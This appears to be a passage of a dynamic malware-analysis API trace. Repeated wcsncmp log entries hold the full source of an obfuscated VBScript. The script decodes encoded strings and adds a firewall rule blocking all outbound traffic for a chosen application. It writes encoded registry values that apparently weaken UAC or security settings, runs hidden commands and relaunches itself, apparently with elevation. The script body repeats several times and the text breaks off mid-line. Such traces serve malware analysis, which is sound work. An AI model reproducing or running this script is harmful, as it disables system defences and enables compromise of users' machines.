policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.289] wcsncmp (_String1="ction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.289] wcsncmp (_String1="tion bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.290] wcsncmp (_String1="ion bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.290] wcsncmp (_String1="on bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = 